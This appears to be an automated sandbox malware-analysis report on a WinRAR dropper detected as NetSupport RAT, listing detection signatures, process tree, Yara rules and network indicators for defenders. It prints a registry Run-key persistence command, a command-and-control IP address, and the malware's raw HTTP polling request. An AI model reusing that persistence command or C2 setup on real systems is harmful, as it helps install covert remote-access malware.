
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1556890
MD5: 166d71e145b2c802acd2b0a07e070bad
SHA1: 1c84d2e573e7096040fbe6e950fbff764aa11096
SHA256: 33b22fce68d5d7bd08e86b8506c50bdfcd38c26db5983864e8d33bdf62f53272
Tags: exe, user-Bitsight

Detection

NetSupport RAT
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Contains functionality to change the wallpaper
Delayed program exit found
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Abnormal high CPU Usage
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

  • System is w10x64
  • file.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 166D71E145B2C802ACD2B0A07E070BAD)
    • cmd.exe (PID: 7456 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 7512 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • bild.exe (PID: 7552 cmdline: C:\Users\Public\Public\Videos\Video\bild.exe MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • bild.exe (PID: 7720 cmdline: "C:\Users\Public\Public\Videos\Video\bild.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • bild.exe (PID: 7988 cmdline: "C:\Users\Public\Public\Videos\Video\bild.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • cleanup
No configs have been found
Dropped files matched by Yara:

Source | Rule | Description | Author | Strings
C:\Users\Public\Public\Videos\Video\bild.exe | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\Public\Public\Videos\Video\PCICHEK.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\Public\Public\Videos\Video\pcicapi.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\Public\Public\Videos\Video\HTCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\Public\Public\Videos\Video\TCCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
(2 further entries not shown)

Memory dumps matched by Yara:

Source | Rule | Description | Author | Strings
00000004.00000002.4157805406.00000000002D2000.00000002.00000001.01000000.00000009.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000009.00000002.1904648910.00000000002D2000.00000002.00000001.01000000.00000009.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000009.00000002.1905862105.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000005.00000002.1827675738.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000005.00000000.1823569679.00000000002D2000.00000002.00000001.01000000.00000009.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
(22 further entries not shown)

Unpacked PEs matched by Yara:

Source | Rule | Description | Author | Strings
5.2.bild.exe.6d0b0000.4.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
4.2.bild.exe.6d0b0000.5.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
9.2.bild.exe.6d0b0000.4.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
9.0.bild.exe.2d0000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
9.2.bild.exe.2d0000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
(22 further entries not shown)

                                System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: C:\Users\Public\Public\Videos\Video\bild.exe, CommandLine: C:\Users\Public\Public\Videos\Video\bild.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Public\Videos\Video\bild.exe, NewProcessName: C:\Users\Public\Public\Videos\Video\bild.exe, OriginalFileName: C:\Users\Public\Public\Videos\Video\bild.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7456, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Public\Videos\Video\bild.exe, ProcessId: 7552, ProcessName: bild.exe
Source: Registry Key set; Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing; Data: Details: C:\Users\Public\Public\Videos\Video\bild.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7512, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat
Source: Network Connection; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: DestinationIp: 45.61.128.74, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Public\Videos\Video\bild.exe, Initiated: true, ProcessId: 7552, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\Public\Public\Videos\Video\bild.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7512, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat
Source: Process started; Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community; Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7456, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe", ProcessId: 7512, ProcessName: reg.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7456, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe", ProcessId: 7512, ProcessName: reg.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-16T12:41:03.602345+0100 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 45.61.128.74 | 443 | TCP


                                AV Detection

Source: C:\Users\Public\Public\Videos\Video\PCICL32.DLL; Virustotal: Detection: 16%
Source: C:\Users\Public\Public\Videos\Video\bild.exe; ReversingLabs: Detection: 28%
Source: C:\Users\Public\Public\Videos\Video\bild.exe; Virustotal: Detection: 49%
Source: C:\Users\Public\Public\Videos\Video\remcmdstub.exe; ReversingLabs: Detection: 13%
Source: file.exe; ReversingLabs: Detection: 50%
Source: file.exe; Virustotal: Detection: 51%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 95.0% probability
Source: C:\Users\Public\Public\Videos\Video\bild.exe; Code function: 4_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,4_2_110AD570
Source: C:\Users\Public\Public\Videos\Video\bild.exe; Code function: 5_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,5_2_110AD570
Source: file.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\Public\Public\Videos\Video\msvcr100.dll
Source: file.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: file.exe
                                Source: Binary string: msvcr100.i386.pdb source: file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, bild.exe, 00000004.00000002.4161525589.000000006C951000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 00000005.00000002.1828324203.000000006C951000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 00000009.00000002.1906366443.000000006C951000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: bild.exe, 00000004.00000002.4161859396.000000006E512000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 00000005.00000002.1828623878.000000006E512000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 00000009.00000002.1906634135.000000006E512000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905822054.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: bild.exe, 00000004.00000002.4161374183.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: bild.exe, 00000004.00000002.4157805406.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000004.00000000.1717304165.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000005.00000000.1823569679.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000005.00000002.1826096354.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000009.00000002.1904648910.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000009.00000000.1903730466.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, bild.exe.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: bild.exe, 00000004.00000002.4161374183.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: bild.exe, 00000004.00000002.4161743565.000000006D0B5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 00000005.00000002.1828561187.000000006D0B5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 00000009.00000002.1906535129.000000006D0B5000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: TCCTL32.DLL.0.dr
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_0015A273 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0015A273
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_0016A537 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0016A537
Source: C:\Users\Public\Public\Videos\Video\bild.exe; Code function: 4_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102D330
Source: C:\Users\Public\Public\Videos\Video\bild.exe; Code function: 4_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,4_2_11065890
Source: C:\Users\Public\Public\Videos\Video\bild.exe; Code function: 4_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,4_2_1106A0A0
Source: C:\Users\Public\Public\Videos\Video\bild.exe; Code function: 4_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,4_2_111266E0
Source: C:\Users\Public\Public\Videos\Video\bild.exe; Code function: 5_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,5_2_1102D330
Source: C:\Users\Public\Public\Videos\Video\bild.exe; Code function: 5_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,5_2_11065890
Source: C:\Users\Public\Public\Videos\Video\bild.exe; Code function: 5_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,5_2_1106A0A0
Source: C:\Users\Public\Public\Videos\Video\bild.exe; Code function: 5_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,5_2_111266E0
Source: C:\Users\Public\Public\Videos\Video\bild.exe; Code function: 5_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,5_2_1110AFD0

                                Networking

Source: Network traffic; Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.4:49730 -> 45.61.128.74:443
Source: global traffic; HTTP traffic detected:
GET /location/loca.asp HTTP/1.1
Host: geo.netsupportsoftware.com
Connection: Keep-Alive
Cache-Control: no-cache
Source: Joe Sandbox View; IP Address: 104.26.0.231
Source: Joe Sandbox View; ASN Name: M247GB
Source: unknown; TCP traffic detected without corresponding DNS query: 45.61.128.74
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: geo.netsupportsoftware.com
Source: unknown; HTTP traffic detected:
POST http://45.61.128.74/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Host: 45.61.128.74
Connection: Keep-Alive
CMD=POLL
INFO=1
ACK=1
Source: bild.exe, bild.exe, 00000004.00000002.4161374183.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr; String found in binary or memory: http://%s/fakeurl.htm
Source: bild.exe, bild.exe, 00000004.00000002.4161374183.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr; String found in binary or memory: http://%s/testpage.htm
Source: bild.exe, 00000004.00000002.4161374183.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr; String found in binary or memory: http://%s/testpage.htmwininet.dll
Source: bild.exe, bild.exe, 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905822054.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr; String found in binary or memory: http://127.0.0.1
Source: file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905822054.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr; String found in binary or memory: http://127.0.0.1RESUMEPRINTING
Source: remcmdstub.exe.0.dr; String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: remcmdstub.exe.0.dr; String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: remcmdstub.exe.0.dr; String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0$
Source: remcmdstub.exe.0.dr; String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: remcmdstub.exe.0.dr; String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: bild.exe, bild.exe, 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905822054.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr; String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
Source: bild.exe, 00000004.00000002.4158412935.0000000000A65000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspD
Source: file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905822054.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr; String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
Source: remcmdstub.exe.0.dr; String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: remcmdstub.exe.0.dr; String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: remcmdstub.exe.0.dr; String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: remcmdstub.exe.0.dr; String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: remcmdstub.exe.0.dr; String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: file.exe, 00000000.00000003.1700783369.000000000306B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr; String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: file.exe, 00000000.00000003.1700783369.000000000306B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr; String found in binary or memory: http://s2.symcb.com0
Source: remcmdstub.exe.0.dr; String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: remcmdstub.exe.0.dr; String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: remcmdstub.exe.0.dr; String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: remcmdstub.exe.0.dr; String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: file.exe, 00000000.00000003.1700783369.000000000306B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr; String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: file.exe, 00000000.00000003.1700783369.000000000306B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr; String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: file.exe, 00000000.00000003.1700783369.000000000306B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr; String found in binary or memory: http://sv.symcd.com0&
Source: file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1827675738.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905862105.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr; String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
Source: file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1827675738.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905862105.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr; String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
Source: file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1827675738.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905862105.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr; String found in binary or memory: http://www.pci.co.uk/support
Source: file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1827675738.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905862105.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr; String found in binary or memory: http://www.pci.co.uk/supportsupport
Source: file.exe, 00000000.00000003.1700783369.000000000306B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr; String found in binary or memory: http://www.symauth.com/cps0(
Source: file.exe, 00000000.00000003.1700783369.000000000306B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr; String found in binary or memory: http://www.symauth.com/rpa00
Source: file.exe, 00000000.00000003.1700783369.000000000306B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr; String found in binary or memory: https://d.symcb.com/cps0%
Source: file.exe, 00000000.00000003.1700783369.000000000306B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr; String found in binary or memory: https://d.symcb.com/rpa0
Source: remcmdstub.exe.0.dr; String found in binary or memory: https://www.globalsign.com/repository/0
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
